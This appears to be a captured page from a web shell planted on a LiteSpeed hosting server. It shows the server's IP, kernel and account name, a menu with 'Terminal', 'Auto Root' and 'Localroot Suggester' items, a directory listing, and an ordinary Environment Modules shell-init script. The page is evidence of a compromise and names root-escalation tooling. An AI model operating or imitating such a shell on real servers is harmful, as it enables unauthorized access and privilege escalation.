Linux spg20.cloudpowerdns.com 5.14.0-611.35.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 25 03:46:09 EST 2026 x86_64
LiteSpeed
Server IP : 46.4.120.162 & Your IP : 216.73.216.144
Domains :
Cant Read [ /etc/named.conf ]
User : seatingsolutions
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
Modules /
init /
Delete
Unzip
Name
Size
Permission
Date
Action
ksh-functions
[ DIR ]
drwxr-xr-x
2026-03-01 07:03
zsh-functions
[ DIR ]
drwxr-xr-x
2026-03-01 07:03
bash
1.7
KB
-rw-r--r--
2025-09-21 09:06
bash_completion
12.53
KB
-rw-r--r--
2025-09-21 09:06
cmake
1.2
KB
-rw-r--r--
2025-09-21 09:06
csh
232
B
-rw-r--r--
2025-09-21 09:06
fish
867
B
-rw-r--r--
2025-09-21 09:06
fish_completion
13
KB
-rw-r--r--
2023-05-14 17:11
ksh
1.7
KB
-rw-r--r--
2025-09-21 09:06
lisp
3.15
KB
-rw-r--r--
2025-09-21 09:06
perl.pm
764
B
-rw-r--r--
2025-09-21 09:06
profile.csh
109
B
-rw-r--r--
2025-09-21 09:06
profile.sh
479
B
-rw-r--r--
2025-09-21 09:06
python.py
1.14
KB
-rw-r--r--
2025-09-21 09:06
r.R
1005
B
-rw-r--r--
2025-09-21 09:06
ruby.rb
883
B
-rw-r--r--
2025-09-21 09:06
sh
2.08
KB
-rw-r--r--
2025-09-21 09:06
tcl
1.1
KB
-rw-r--r--
2025-09-21 09:06
tcsh
233
B
-rw-r--r--
2025-09-21 09:06
tcsh_completion
7.78
KB
-rw-r--r--
2025-09-21 09:06
zsh
1.99
KB
-rw-r--r--
2025-09-21 09:06
Save
Rename
# shellcheck shell=sh # get current shell name by querying shell variables or looking at parent # process name if [ -n "${BASH:-}" ]; then if [ "${BASH##*/}" = 'sh' ]; then shell='sh' else shell='bash' fi elif [ -n "${ZSH_NAME:-}" ]; then shell=$ZSH_NAME else shell=$(/usr/bin/basename "$(/usr/bin/ps -p $$ -ocomm=)") fi if [ -f "/usr/share/Modules/init/$shell" ]; then . "/usr/share/Modules/init/$shell" else . '/usr/share/Modules/init/sh' fi